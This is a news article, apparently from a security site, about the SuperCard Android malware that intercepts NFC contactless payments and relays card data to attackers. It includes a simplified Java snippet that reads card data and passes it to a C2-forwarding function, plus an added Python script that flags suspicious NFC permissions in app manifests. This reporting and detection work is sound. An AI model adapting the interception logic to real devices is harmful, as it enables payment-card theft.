New SuperCard Malware Using Hacked Android Phones to Relay Data from Users' Payment Cards to Attackers' Device

In a concerning development for mobile payment security, cybersecurity experts have identified a sophisticated new malware strain named “SuperCard” that exploits Android devices to steal payment card data.
This malicious application, a modified version of the legitimate NFCGate program, intercepts Near Field Communication (NFC) traffic during contactless payments, effectively turning compromised phones into relay devices that transmit sensitive financial information directly to attackers.
First detected in April 2025 by Italian security firm Cleafy, SuperCard initially targeted European banking customers before expanding its reach.
The malware operates as part of a well-organized “malware-as-a-service” (MaaS) platform called SuperCard X, which cybercriminals can subscribe to through underground Telegram channels.
Unlike previous NFC-exploiting threats, SuperCard offers subscribers sophisticated customer support services, reflecting the increasingly professional nature of today’s cybercrime ecosystem.
Habr researchers identified that the attack begins with social engineering tactics, where victims receive messages from seemingly legitimate sources urging them to install what appears to be a useful application.
Once installed, the malware requests permissions to access the device’s NFC module and payment systems, establishing itself as the default payment handler.

    // Simplified representation of SuperCard's NFC interception mechanism
    // Uses android.nfc.Tag, android.nfc.tech.IsoDep and android.util.Log;
    // sendToAttacker() is not defined in this excerpt.
    @Override
    public void onTagDiscovered(Tag tag) {
        IsoDep isoDep = IsoDep.get(tag);
        try {
            isoDep.connect();
            // SELECT-by-AID command; bytes above 0x7F need a (byte) cast to compile in Java
            byte[] command = {0x00, (byte) 0xA4, 0x04, 0x00, 0x07, (byte) 0xA0, 0x00, 0x00, 0x00, 0x42, 0x10, 0x10};
            byte[] result = isoDep.transceive(command);
            // Intercept and forward card data to C2 server
            sendToAttacker(result);
        } catch (Exception e) {
            Log.e("SuperCard", "Error communicating with card", e);
        }
    }

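A triage check for the install-time behaviour described above (NFC permission requests and registration as a payment handler), added here as an example and not taken from the article or from any vendor's tooling. It assumes the APK manifest has already been decoded to XML; the package name, service name and allowlist parameter are constructed for illustration.

```python
import xml.etree.ElementTree as ET

ANDROID_NS = "{http://schemas.android.com/apk/res/android}"
HCE_ACTION = "android.nfc.cardemulation.action.HOST_APDU_SERVICE"

# Constructed sample: decoded manifest of a hypothetical, non-wallet app.
SAMPLE_MANIFEST = """<manifest
    xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.verifier">
  <uses-permission android:name="android.permission.NFC"/>
  <uses-permission android:name="android.permission.INTERNET"/>
  <application>
    <service android:name=".CardService"
        android:permission="android.permission.BIND_NFC_SERVICE">
      <intent-filter>
        <action android:name="android.nfc.cardemulation.action.HOST_APDU_SERVICE"/>
      </intent-filter>
    </service>
  </application>
</manifest>"""


def triage_manifest(xml_text, wallet_allowlist=frozenset()):
    """Return findings for NFC capabilities a non-wallet app should not need."""
    root = ET.fromstring(xml_text)
    if root.get("package", "") in wallet_allowlist:
        return []  # known payment apps legitimately use these features
    perms = {p.get(ANDROID_NS + "name") for p in root.iter("uses-permission")}
    findings = []
    if "android.permission.NFC" in perms:
        findings.append("requests NFC access")
        # NFC plus network access is the minimum needed to forward card traffic.
        if "android.permission.INTERNET" in perms:
            findings.append("combines NFC with network access")
    for service in root.iter("service"):
        actions = {a.get(ANDROID_NS + "name") for a in service.iter("action")}
        if HCE_ACTION in actions:
            name = service.get(ANDROID_NS + "name", "?")
            findings.append("declares card-emulation service " + name)
    return findings


if __name__ == "__main__":
    for finding in triage_manifest(SAMPLE_MANIFEST):
        print("FLAG:", finding)
```

Each finding is a prompt for manual review, since legitimate wallet and transit apps declare the same capabilities.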
Infection Mechanism and Data Exfiltration
The sophistication of SuperCard lies in its multi-stage infection process. After installation, the malware remains dormant until it detects a payment transaction.
When a user attempts to make a contactless payment, SuperCard activates in the background, capturing the transaction data while allowing the legitimate payment to proceed.
This stealth approach ensures victims remain unaware of the compromise while their card details are transmitted to command-and-control servers.
F6 security analysts report that SuperCard has already compromised over 175,000 Android devices in Russia alone, with damages exceeding 432 million rubles in the first quarter of 2025.
The malware’s rapid global spread demonstrates the evolving threat landscape for mobile payment systems, requiring users to exercise extreme caution when installing applications, even those that appear legitimate.
The post New SuperCard Malware Using Hacked Android Phones to Relay Data from Users' Payment Cards to Attackers' Device appeared first on Cyber Security News.